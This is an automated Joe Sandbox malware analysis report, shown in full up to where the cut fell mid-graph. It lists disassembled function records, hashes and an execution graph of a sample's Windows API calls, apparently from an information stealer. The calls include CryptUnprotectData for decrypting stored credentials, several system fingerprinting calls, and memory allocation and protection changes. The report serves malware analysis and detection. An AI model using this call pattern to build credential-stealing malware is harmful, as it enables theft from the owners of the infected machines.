                                                                                • Source File: 00000005.00000002.1994309772.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_400000_sdveeeu.jbxd
                                                                                Similarity
                                                                                • API ID: CreateDuplicateObjectSectionSleep
                                                                                • String ID:
                                                                                • API String ID: 4152845823-0
                                                                                • Opcode ID: a19bf6b6478727a7cf19fe344aa6eb98edbd1b9355ee0bc977b84921ba6b77a5
                                                                                • Instruction ID: 3d34462ae554e6b9c52ec10bfc335e1d4eef14cf0cc07287d36856a9453ce069
                                                                                • Opcode Fuzzy Hash: a19bf6b6478727a7cf19fe344aa6eb98edbd1b9355ee0bc977b84921ba6b77a5
                                                                                • Instruction Fuzzy Hash: AA11E17274A205FBDB00AA949C41EBA3228AB45714F308577BA43780F1D57D8953BF6F
                                                                                Function 004019EE Relevance: 1.3, APIs: 1, Instructions: 58sleepCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 479 4019ee-4019f6 480 4019f8-401a0b 479->480 484 401a60 480->484 485 401a06-401a48 call 4012a9 Sleep call 401524 480->485 484->480 486 401a62 484->486 494 401a57-401a6f 485->494 513 401a4a-401a52 call 401615 485->513 488 401a53 486->488 489 401a64 486->489 488->494 491 401a66-401a6b 489->491 492 401ace-401b1c call 4012a9 489->492 497 401a72-401aa7 call 4012a9 491->497 520 401b21 492->520 494->497 506 401a65-401a6b 494->506 506->497 513->488 520->520
                                                                                APIs
                                                                                • Sleep.KERNELBASE(00001388), ref: 00401A33
                                                                                  • Part of subcall function 00401615: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004016D5
                                                                                  • Part of subcall function 00401615: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401702
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.1994309772.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_400000_sdveeeu.jbxd
                                                                                Similarity
                                                                                • API ID: CreateDuplicateObjectSectionSleep
                                                                                • String ID:
                                                                                • API String ID: 4152845823-0
                                                                                • Opcode ID: c9c058988959fe6f1bebb02f4b63465d1859dbae07441d9c99848e32b1ac1650
                                                                                • Instruction ID: fd11faa5c1113836d14621795cf3d83bd65fd701f71c993b701afff5049cc75c
                                                                                • Opcode Fuzzy Hash: c9c058988959fe6f1bebb02f4b63465d1859dbae07441d9c99848e32b1ac1650
                                                                                • Instruction Fuzzy Hash: 27018B3274A201EBDB009A949C42ABA3728AF45714F2045B7BA43B90F1C67D99536F2B
                                                                                Function 004019FA Relevance: 1.3, APIs: 1, Instructions: 58sleepCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 522 4019fa-4019fc 524 4019f3 522->524 525 4019ff-401a0b 522->525 526 4019f8 524->526 529 401a60 525->529 530 401a06-401a48 call 4012a9 Sleep call 401524 525->530 526->525 529->526 531 401a62 529->531 539 401a57-401a6f 530->539 558 401a4a-401a52 call 401615 530->558 533 401a53 531->533 534 401a64 531->534 533->539 536 401a66-401a6b 534->536 537 401ace-401b1c call 4012a9 534->537 542 401a72-401aa7 call 4012a9 536->542 565 401b21 537->565 539->542 551 401a65-401a6b 539->551 551->542 558->533 565->565
                                                                                APIs
                                                                                • Sleep.KERNELBASE(00001388), ref: 00401A33
                                                                                  • Part of subcall function 00401615: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004016D5
                                                                                  • Part of subcall function 00401615: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401702
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.1994309772.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_400000_sdveeeu.jbxd
                                                                                Similarity
                                                                                • API ID: CreateDuplicateObjectSectionSleep
                                                                                • String ID:
                                                                                • API String ID: 4152845823-0
                                                                                • Opcode ID: e11e32dbe801df22405823e13fb522a3676c7564745947c388d06d8c8a7d4e2f
                                                                                • Instruction ID: 6cc9081dd0b90bd572a9145dab600ca03ca16d67528742debddf3dc55f5ee8c1
                                                                                • Opcode Fuzzy Hash: e11e32dbe801df22405823e13fb522a3676c7564745947c388d06d8c8a7d4e2f
                                                                                • Instruction Fuzzy Hash: 1A01C03274A105EBDB009A949C41EBA3328AB44710F308577BA43790F1C57D8A537F6F
                                                                                Function 00401A09 Relevance: 1.3, APIs: 1, Instructions: 49sleepCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 567 401a09-401a48 call 4012a9 Sleep call 401524 576 401a57-401a6f 567->576 577 401a4a-401a53 call 401615 567->577 582 401a72-401aa7 call 4012a9 576->582 583 401a65-401a6b 576->583 577->576 583->582
                                                                                APIs
                                                                                • Sleep.KERNELBASE(00001388), ref: 00401A33
                                                                                  • Part of subcall function 00401615: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004016D5
                                                                                  • Part of subcall function 00401615: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401702
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.1994309772.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_400000_sdveeeu.jbxd
                                                                                Similarity
                                                                                • API ID: CreateDuplicateObjectSectionSleep
                                                                                • String ID:
                                                                                • API String ID: 4152845823-0
                                                                                • Opcode ID: cf05c8cd51f06970e1e68389e54baa8339b7ac568fc1d90295f4adfe3ec01b5a
                                                                                • Instruction ID: 82411e1791d3a8170d7b0096784b0d07359e834b960e05cc8d1eb1f577d4cd17
                                                                                • Opcode Fuzzy Hash: cf05c8cd51f06970e1e68389e54baa8339b7ac568fc1d90295f4adfe3ec01b5a
                                                                                • Instruction Fuzzy Hash: 90018F3274A205EBDB00AAD4AC42EAA33289F45714F244577FA43B90F1C57D8A536F6B
                                                                                Function 030117C4 Relevance: 1.3, APIs: 1, Instructions: 48memoryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 03011815
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.1997359017.000000000300B000.00000040.00000020.00020000.00000000.sdmp, Offset: 0300B000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_300b000_sdveeeu.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: AllocVirtual
                                                                                • String ID:
                                                                                • API String ID: 4275171209-0
                                                                                • Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                                                • Instruction ID: 1e34423dd79a0492f94bb9b4b67620fad58f7e990735fc39dde29ee12ec70419
                                                                                • Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                                                • Instruction Fuzzy Hash: 16112B79A00208EFDB05DF98C985E99BFF5EF08350F0580A4FA489B362D775EA50DB80
                                                                                Function 00401A10 Relevance: 1.3, APIs: 1, Instructions: 48sleepCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 592 401a10-401a48 call 4012a9 Sleep call 401524 598 401a57-401a6f 592->598 599 401a4a-401a53 call 401615 592->599 604 401a72-401aa7 call 4012a9 598->604 605 401a65-401a6b 598->605 599->598 605->604
                                                                                APIs
                                                                                • Sleep.KERNELBASE(00001388), ref: 00401A33
                                                                                  • Part of subcall function 00401615: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004016D5
                                                                                  • Part of subcall function 00401615: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401702
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.1994309772.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_400000_sdveeeu.jbxd
                                                                                Similarity
                                                                                • API ID: CreateDuplicateObjectSectionSleep
                                                                                • String ID:
                                                                                • API String ID: 4152845823-0
                                                                                • Opcode ID: 1ce4031546dc902cc4609c7e7de6d107d1fd440efca43239d715d6f2af8bec59
                                                                                • Instruction ID: 961536146c74ce18795349366bfe527767909b26be76020be6548142ac7a4a5b
                                                                                • Opcode Fuzzy Hash: 1ce4031546dc902cc4609c7e7de6d107d1fd440efca43239d715d6f2af8bec59
                                                                                • Instruction Fuzzy Hash: 47018472705209EBCB00ABD09C42EA933249B45314F644577FA12B90F2D67D89536B2B

                                                                                Execution Graph

                                                                                Execution Coverage:7.8%
                                                                                Dynamic/Decrypted Code Coverage:34.1%
                                                                                Signature Coverage:8%
                                                                                Total number of Nodes:311
                                                                                Total number of Limit Nodes:10
                                                                                execution_graph 21980 412e44 21981 412e4d 21980->21981 21982 412e57 21981->21982 21984 409960 21981->21984 21985 409975 21984->21985 21989 4099c7 21984->21989 21990 4336f0 21985->21990 21987 409a3b 21988 435440 RtlAllocateHeap 21987->21988 21988->21989 21989->21982 21991 43376b 21990->21991 21992 4337a8 RtlExpandEnvironmentStrings 21990->21992 21991->21992 21993 41b544 21994 41b552 21993->21994 22000 435440 21994->22000 21996 41b55c 22003 41bd00 21996->22003 22021 41f960 21996->22021 21997 41b5c6 22001 4354d0 RtlAllocateHeap 22000->22001 22002 43549d 22000->22002 22001->21996 22002->22001 22004 41bdc0 22003->22004 22005 41bd16 22003->22005 22004->21997 22005->22004 22006 435440 RtlAllocateHeap 22005->22006 22007 41be27 22006->22007 22007->22007 22025 43a060 22007->22025 22009 41beda 22009->22004 22011 435440 RtlAllocateHeap 22009->22011 22010 41be9d 22010->22004 22010->22009 22013 43a060 2 API calls 22010->22013 22012 41beea 22011->22012 22031 43a530 22012->22031 22013->22009 22015 41befc 22016 435440 RtlAllocateHeap 22015->22016 22017 41bf66 22015->22017 22019 41bf78 22016->22019 22017->22004 22038 4373e0 LdrInitializeThunk 22017->22038 22019->22019 22037 408f90 RtlAllocateHeap 22019->22037 22022 41fae0 22021->22022 22023 41f979 22021->22023 22022->21997 22024 435440 RtlAllocateHeap 22023->22024 22024->22022 22026 43a080 22025->22026 22027 435440 RtlAllocateHeap 22026->22027 22029 43a0b5 22027->22029 22028 43a1fe 22028->22010 22029->22028 22039 4373e0 LdrInitializeThunk 22029->22039 22033 43a575 22031->22033 22032 43a6ce 22032->22015 22035 43a5ee 22033->22035 22040 4373e0 LdrInitializeThunk 22033->22040 22035->22032 22041 4373e0 LdrInitializeThunk 22035->22041 22037->22017 22038->22004 22039->22028 22040->22035 22041->22032 22263 436d86 22264 436da7 22263->22264 22265 436e6f LoadLibraryW 22264->22265 22266 436e76 22265->22266 22267 414c84 22268 414cd0 22267->22268 22269 435440 RtlAllocateHeap 22268->22269 22270 414d2a 22269->22270 22270->22270 22271 43a060 2 API calls 22270->22271 22272 414d9e 22271->22272 22042 41184c 22043 411855 22042->22043 22048 414ec0 22043->22048 22045 41186c 22046 409960 RtlExpandEnvironmentStrings RtlAllocateHeap 22045->22046 22047 411876 22046->22047 22049 414ee0 22048->22049 22049->22049 22050 414eeb RtlExpandEnvironmentStrings 22049->22050 22051 414f08 22050->22051 22052 435440 RtlAllocateHeap 22051->22052 22053 414f18 RtlExpandEnvironmentStrings 22052->22053 22054 414fa1 22053->22054 22055 435440 RtlAllocateHeap 22054->22055 22056 415056 22055->22056 22056->22056 22057 43a060 2 API calls 22056->22057 22058 4150ca 22057->22058 22273 42880f 22274 428816 22273->22274 22275 4336f0 RtlExpandEnvironmentStrings 22274->22275 22276 4288ea 22275->22276 22277 428934 GetPhysicallyInstalledSystemMemory 22276->22277 22278 428959 22277->22278 22278->22278 22279 412c8c 22280 412c90 22279->22280 22280->22280 22281 435440 RtlAllocateHeap 22280->22281 22282 412cba 22281->22282 22059 43724d 22060 437295 22059->22060 22061 4372df RtlReAllocateHeap 22059->22061 22060->22061 22062 4373a0 22061->22062 22063 427353 22064 42735d 22063->22064 22064->22064 22065 427de0 GetComputerNameExA 22064->22065 22066 427efb GetComputerNameExA 22064->22066 22065->22064 22066->22064 22067 413ed3 22072 42ec90 22067->22072 22069 413ee0 22070 409960 RtlExpandEnvironmentStrings RtlAllocateHeap 22069->22070 22071 413efc 22070->22071 22073 42ecc7 KiUserCallbackDispatcher GetSystemMetrics 22072->22073 22074 42ed10 DeleteObject 22073->22074 22076 42ed7e SelectObject 22074->22076 22078 42ee29 SelectObject 22076->22078 22079 42ee55 DeleteObject 22078->22079 22283 425e97 22284 425e63 22283->22284 22284->22283 22285 42605e 22284->22285 22287 4373e0 LdrInitializeThunk 22284->22287 22287->22285 22081 422ddb 22082 422df0 22081->22082 22082->22082 22083 435440 RtlAllocateHeap 22082->22083 22084 422ee2 22083->22084 22084->22084 22085 43a060 2 API calls 22084->22085 22086 422f8a 22085->22086 22293 412198 22294 4121a1 22293->22294 22299 417a30 22294->22299 22296 4121b9 22297 409960 RtlExpandEnvironmentStrings RtlAllocateHeap 22296->22297 22298 4121c3 22297->22298 22300 417a50 22299->22300 22300->22300 22301 417a5b RtlExpandEnvironmentStrings 22300->22301 22302 417a78 22301->22302 22303 435440 RtlAllocateHeap 22302->22303 22304 417a88 RtlExpandEnvironmentStrings 22303->22304 22305 43a250 2 API calls 22304->22305 22306 417aa9 22305->22306 22087 4331d8 22088 433238 22087->22088 22089 4332c0 22088->22089 22091 4373e0 LdrInitializeThunk 22088->22091 22091->22089 22092 415cdd 22093 415cf1 22092->22093 22094 435440 RtlAllocateHeap 22093->22094 22096 415d30 22094->22096 22095 435440 RtlAllocateHeap 22097 415de3 22095->22097 22096->22095 22097->22097 22100 43a250 22097->22100 22099 415e51 22101 43a270 22100->22101 22102 435440 RtlAllocateHeap 22101->22102 22103 43a2a0 22102->22103 22104 43a3ce 22103->22104 22106 4373e0 LdrInitializeThunk 22103->22106 22104->22099 22106->22104 22317 414a9f 22318 435440 RtlAllocateHeap 22317->22318 22319 414aa7 22318->22319 22320 43a530 LdrInitializeThunk 22319->22320 22321 414abe 22320->22321 22322 408ea0 22324 408eab 22322->22324 22323 408f0b ExitProcess 22325 408ebc GetStdHandle GetConsoleWindow 22324->22325 22326 408eaf 22324->22326 22325->22326 22326->22323 22113 416460 22116 4174d0 22113->22116 22117 417599 22116->22117 22118 435440 RtlAllocateHeap 22117->22118 22119 417665 22118->22119 22120 435440 RtlAllocateHeap 22119->22120 22121 417862 22120->22121 22122 41ede3 22123 41edf3 22122->22123 22124 41ee02 22122->22124 22123->22124 22128 43a900 22123->22128 22132 43b050 RtlAllocateHeap LdrInitializeThunk 22124->22132 22127 41eeb7 22130 43a920 22128->22130 22129 43aa1e 22129->22124 22130->22129 22133 4373e0 LdrInitializeThunk 22130->22133 22132->22127 22133->22129 22327 433ca4 22328 43a060 2 API calls 22327->22328 22329 433cb9 22328->22329 22330 43a060 2 API calls 22329->22330 22331 433cfe 22330->22331 22134 42b5e8 22135 42b6f6 22134->22135 22136 42b72c SysAllocString 22134->22136 22135->22136 22137 42b79e 22136->22137 22332 417b2d 22333 417b8b 22332->22333 22334 41a800 2 API calls 22333->22334 22335 417bcc 22334->22335 22138 4168ef 22139 416938 22138->22139 22140 435440 RtlAllocateHeap 22139->22140 22141 416cc3 22140->22141 22142 41c0f0 22143 41c150 22142->22143 22144 41c0fc 22142->22144 22145 435440 RtlAllocateHeap 22144->22145 22146 41c164 22145->22146 22147 435440 RtlAllocateHeap 22146->22147 22147->22143 22336 419db0 22337 419dbe 22336->22337 22341 419e00 22336->22341 22338 435440 RtlAllocateHeap 22337->22338 22339 419e14 22338->22339 22339->22339 22342 419ec0 22339->22342 22343 419f2d 22342->22343 22344 435440 RtlAllocateHeap 22343->22344 22346 419fb2 22344->22346 22345 43a250 2 API calls 22347 41a01d 22345->22347 22346->22345 22346->22346 22148 41baf3 22149 435440 RtlAllocateHeap 22148->22149 22150 41bb0a 22149->22150 22151 20f003c 22152 20f0049 22151->22152 22153 20f004c 22151->22153 22167 20f0e0f SetErrorMode SetErrorMode 22153->22167 22158 20f0265 22159 20f02ce VirtualProtect 22158->22159 22161 20f030b 22159->22161 22160 20f0439 VirtualFree 22165 20f05f4 LoadLibraryA 22160->22165 22166 20f04be 22160->22166 22161->22160 22162 20f04e3 LoadLibraryA 22162->22166 22164 20f08c7 22165->22164 22166->22162 22166->22165 22168 20f0223 22167->22168 22169 20f0d90 22168->22169 22170 20f0dad 22169->22170 22171 20f0dbb GetPEB 22170->22171 22172 20f0238 VirtualAlloc 22170->22172 22171->22172 22172->22158 22177 413cf5 22178 413d05 22177->22178 22205 41cfa0 22178->22205 22180 413d0b 22181 409960 RtlExpandEnvironmentStrings RtlAllocateHeap 22180->22181 22182 413d15 22181->22182 22183 41d8e0 6 API calls 22182->22183 22184 413d28 22183->22184 22185 409960 RtlExpandEnvironmentStrings RtlAllocateHeap 22184->22185 22186 413d32 22185->22186 22187 41db10 LdrInitializeThunk 22186->22187 22188 413d48 22187->22188 22189 409960 RtlExpandEnvironmentStrings RtlAllocateHeap 22188->22189 22190 413d52 22189->22190 22191 41fd10 RtlAllocateHeap LdrInitializeThunk 22190->22191 22192 413d68 22191->22192 22193 420880 RtlAllocateHeap LdrInitializeThunk 22192->22193 22194 413d71 22193->22194 22195 420d60 LdrInitializeThunk 22194->22195 22196 413d7a 22195->22196 22197 409960 RtlExpandEnvironmentStrings RtlAllocateHeap 22196->22197 22198 413d84 22197->22198 22199 409960 RtlExpandEnvironmentStrings RtlAllocateHeap 22198->22199 22200 413da4 22199->22200 22201 425260 RtlAllocateHeap 22200->22201 22202 413dba 22201->22202 22203 42eab0 6 API calls 22202->22203 22204 413dc3 22203->22204 22206 41d016 22205->22206 22207 41d069 RtlExpandEnvironmentStrings 22205->22207 22206->22207 22208 41d0ae 22207->22208 22209 435440 RtlAllocateHeap 22208->22209 22210 41d0be RtlExpandEnvironmentStrings 22209->22210 22211 41d13b 22210->22211 22212 435440 RtlAllocateHeap 22211->22212 22213 41d1ca 22212->22213 22214 43a250 2 API calls 22213->22214 22215 41d247 22214->22215 22216 42f3f6 22219 42fae0 22216->22219 22220 42fb34 22219->22220 22221 435440 RtlAllocateHeap 22220->22221 22222 42fc14 22221->22222 22223 431df6 22224 431dfb 22223->22224 22225 435440 RtlAllocateHeap 22224->22225 22226 431e09 22225->22226 22227 43a530 LdrInitializeThunk 22226->22227 22228 431e33 22227->22228 22229 4fec79 22232 4fec9e 22229->22232 22233 4fecad 22232->22233 22236 4ff43e 22233->22236 22239 4ff459 22236->22239 22237 4ff462 CreateToolhelp32Snapshot 22238 4ff47e Module32First 22237->22238 22237->22239 22240 4ff48d 22238->22240 22241 4fec9d 22238->22241 22239->22237 22239->22238 22243 4ff0fd 22240->22243 22244 4ff128 22243->22244 22245 4ff139 VirtualAlloc 22244->22245 22246 4ff171 22244->22246 22245->22246 22246->22246 22348 43803b 22350 437f65 22348->22350 22349 4380c5 22350->22348 22350->22349 22352 4373e0 LdrInitializeThunk 22350->22352 22352->22350 22353 41a63b 22354 41a640 22353->22354 22354->22354 22355 41a800 2 API calls 22354->22355 22356 41a6f9 22355->22356 22247 41a77a 22248 41a793 22247->22248 22251 41a800 22248->22251 22252 43a060 2 API calls 22251->22252 22253 41a859 22252->22253 22254 4337fd 22257 439500 22254->22257 22256 43382b GetVolumeInformationW 22357 43793d 22358 437982 22357->22358 22360 4379ee 22358->22360 22361 4373e0 LdrInitializeThunk 22358->22361 22361->22360 22258 41537e 22259 415388 22258->22259 22260 435440 RtlAllocateHeap 22259->22260 22262 4154e8 22260->22262 22261 415635 CryptUnprotectData 22262->22261

                                                                                Executed Functions

                                                                                Function 004016E0 Relevance: 15.5, Strings: 12, Instructions: 492COMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 26 4016e0-4016ef 27 4016f5-40170a call 408960 26->27 28 4017ee-4017f7 26->28 31 401725-401730 27->31 32 40170c-40170f 27->32 31->28 34 401736 31->34 33 401710-401722 call 408960 32->33 49 401724 33->49 34->28 36 4018f5-401902 34->36 37 401856-401868 call 4088d0 34->37 38 4018a7-4018be call 402c70 34->38 39 40198b-40199d call 4088d0 34->39 40 40173d-401758 call 408980 34->40 41 4019cf-4019dc 34->41 36->28 59 401908-401924 36->59 56 401ac8-401ada 37->56 57 40186e-401880 call 4088d0 37->57 38->28 55 4018c4-4018cc call 435440 38->55 39->28 58 4019a3-4019b5 39->58 60 4017ec 40->60 61 40175e-40176d 40->61 41->28 54 4019e2-4019fe 41->54 49->31 72 401a04-401a49 54->72 73 401afc-401b04 54->73 65 4018d2-4018d7 55->65 56->28 77 401ae0 56->77 57->28 78 401886-40189a 57->78 58->28 79 4019bb-4019c1 58->79 59->73 80 40192a-40194c 59->80 60->28 61->60 63 40176f-401781 61->63 70 401783-401787 63->70 71 4017b4-4017b6 63->71 75 401c08 65->75 76 4018dd-4018f0 65->76 81 401789-40178d 70->81 82 40178f-401792 70->82 74 4017c0-4017c3 71->74 85 401b09-401b0f call 402700 72->85 86 401a4f-401a57 72->86 84 401c09 73->84 87 4017c5-4017e4 call 408880 74->87 88 4017f8-401814 call 408e00 74->88 75->84 89 4019c8-4019ca 76->89 90 401ae5-401af7 77->90 78->90 108 4018a0-4018a2 78->108 79->89 80->85 91 401952-40195a 80->91 81->60 81->82 82->71 83 401794-4017ac call 4088d0 82->83 83->71 110 4017ae-4017b2 83->110 103 401c0f-401c12 84->103 85->103 93 401a59 86->93 94 401a5b-401a63 86->94 87->74 112 4017e6-4017ea 87->112 88->28 113 401816-40182c call 408e00 88->113 89->28 90->28 99 40195c 91->99 100 40195e-401962 91->100 93->94 104 401a64-401a79 call 408960 94->104 99->100 101 401963-401975 call 408960 100->101 118 401977-40197a 101->118 103->28 119 401a7b-401a9b call 408960 104->119 108->28 110->60 110->71 112->28 113->28 120 40182e-40183b 113->120 121 401980-401986 118->121 122 401c17-401c19 118->122 135 401ab3-401aba 119->135 136 401a9d 119->136 120->28 131 40183d-401851 120->131 121->28 124 401d52-401d53 122->124 125 401c1f 122->125 129 401d55-401d63 call 408960 124->129 128 401c23-401c29 call 4016e0 125->128 137 401c2e-401c30 128->137 144 401d65 129->144 145 401d7a-401d81 129->145 131->89 140 401da0-401da1 135->140 141 401ac0-401ac3 135->141 139 401a9e-401ab0 call 408960 136->139 142 401c36-401c41 137->142 143 401d8f-401d93 137->143 162 401ab2 139->162 148 401dd0-401dda call 402700 140->148 141->28 149 401cd7-401cf8 call 408960 142->149 150 401c47-401c52 142->150 143->148 151 401d66-401d78 call 408960 144->151 145->140 147 401d83-401d88 145->147 153 401d95 147->153 154 401d8a-401d8d 147->154 148->28 167 401d15-401d18 149->167 168 401cfa-401cfb 149->168 156 401c74-401c87 150->156 157 401c54-401c6e 150->157 151->145 163 401d97-401d9e call 403060 153->163 154->163 165 401daa-401db7 call 402700 156->165 175 401c8d-401c9d 156->175 157->156 157->165 162->135 163->140 179 401da3-401da5 163->179 165->148 167->129 171 401d1a-401d1b 167->171 173 401d00-401d12 call 408960 168->173 178 401d20-401d35 call 408960 171->178 185 401d14 173->185 176 401cbb 175->176 177 401c9f-401ca4 175->177 182 401cbd 176->182 181 401ca6-401cb9 call 4087c0 177->181 177->182 190 401d37-401d3a 178->190 179->28 188 401cbf-401cd4 181->188 182->188 185->167 188->149 191 401d44-401d45 190->191 192 401d3c-401d3e 190->192 191->129 192->128 192->191
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.2557418711.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.2557418711.0000000000451000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_F441.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: .$.$0$Uh$C$Wn$[$false$null$true${$+$8o
                                                                                • API String ID: 0-879020378
                                                                                • Opcode ID: d3e6218c0b6d68e631ba44012775654cbb5f14155eaeb5d0a54eed9368251c96
                                                                                • Instruction ID: bd7178ecccf1f1e773a4192e4ca540b31a3e3f12fd5816677c43404a507449fe
                                                                                • Opcode Fuzzy Hash: d3e6218c0b6d68e631ba44012775654cbb5f14155eaeb5d0a54eed9368251c96
                                                                                • Instruction Fuzzy Hash: B9F104B0A003059FE7105F65D885727BBE4AF54308F14853EE886A73E2EB3DE914CB5A
                                                                                Function 0042EC90 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 184COMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.2557418711.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.2557418711.0000000000451000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_F441.jbxd
                                                                                Similarity
                                                                                • API ID: Object$DeleteSelect$CallbackDispatcherMetricsSystemUser
                                                                                • String ID:
                                                                                • API String ID: 1449868515-3916222277
                                                                                • Opcode ID: 39b23aab81d1e412ac723355e7e0d380e93785fe029945261b041932a7300441
                                                                                • Instruction ID: 60327d0f96a7b3deecf0ce21178eeb5ed9b1cd1e9f4d058b5d703ebe2579cb86
                                                                                • Opcode Fuzzy Hash: 39b23aab81d1e412ac723355e7e0d380e93785fe029945261b041932a7300441
                                                                                • Instruction Fuzzy Hash: C8B18CB85093808FE364DF29D58579BBBE0ABC9304F00892EE9D987350D7749548DF8A
                                                                                Function 00427353 Relevance: 9.9, APIs: 2, Strings: 3, Instructions: 1198COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.2557418711.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.2557418711.0000000000451000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_F441.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: 2PBb$Yceh$]hW9
                                                                                • API String ID: 0-1551782443
                                                                                • Opcode ID: f6dc15c76937f0d7342aa57ecbcc9b9ec27201aace4dd33c85c24a32b54af3b4
                                                                                • Instruction ID: 0399154fc7d8c55f12102b5960697b3d06da357f666e701177502f53bd351286
                                                                                • Opcode Fuzzy Hash: f6dc15c76937f0d7342aa57ecbcc9b9ec27201aace4dd33c85c24a32b54af3b4
                                                                                • Instruction Fuzzy Hash: B7926C70208B908EE726CF35C4A07E7BBE1BF16305F44499DD1EB8B282DB796509CB55
                                                                                Function 0041FD10 Relevance: 6.8, Strings: 5, Instructions: 531COMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 588 41fd10-41fd3b 589 41fdc0-41ff6c 588->589 590 420000-4201ac 588->590 591 41fd42-41fd4f 588->591 592 41ffb4-41ffb7 588->592 593 41fd8c 588->593 594 41ffbe-41ffe5 call 43ad30 588->594 604 41ff97-41ffa6 call 43a900 589->604 605 41ff6e-41ff6f 589->605 602 4201d7-4201eb call 43a900 590->602 603 4201ae-4201af 590->603 591->591 599 41fd70-41fd7e 591->599 600 41fda0-41fdaf 591->600 601 41fd85 591->601 592->594 595 420200-42020a 592->595 596 420220-42026d call 437200 592->596 597 41ffec 592->597 593->600 594->596 594->597 595->596 615 420502-420507 596->615 616 420523-42056f 596->616 617 4204a0-4204ab 596->617 618 420280-420291 call 43a900 596->618 619 4202a5 596->619 620 420645-42064c 596->620 621 42062f 596->621 622 4204ec 596->622 623 420512-42051c 596->623 624 420653-42065d 596->624 625 4202b0-420325 596->625 626 420510 596->626 627 4204f6-4204ff call 4087a0 596->627 628 420636-42063e 596->628 629 420397 596->629 630 420399-4203a1 596->630 631 42061e-420628 596->631 597->590 599->591 599->601 600->589 600->591 600->601 601->593 602->595 609 4201b0-4201d5 603->609 612 41ffab 604->612 611 41ff70-41ff95 605->611 609->602 609->609 611->604 611->611 612->592 615->626 638 4205b0-4205b8 616->638 639 420571 616->639 632 4204b2-4204d0 call 435440 call 43aa50 617->632 633 4204ad 617->633 649 420296-42029e 618->649 619->625 620->624 620->628 621->628 622->627 623->615 623->616 623->617 623->618 623->619 623->620 623->621 623->622 623->623 623->624 623->625 623->626 623->627 623->628 623->629 623->630 623->631 624->615 624->616 624->617 624->618 624->619 624->620 624->621 624->622 624->623 624->624 624->625 624->626 624->627 624->628 624->629 624->630 624->631 635 420372-420383 call 43b430 625->635 636 420327 625->636 627->615 628->615 628->616 628->617 628->618 628->619 628->620 628->621 628->622 628->623 628->624 628->625 628->626 628->627 628->628 628->629 628->630 628->631 629->630 640 4203a3-4203a7 630->640 641 4203c1-420408 630->641 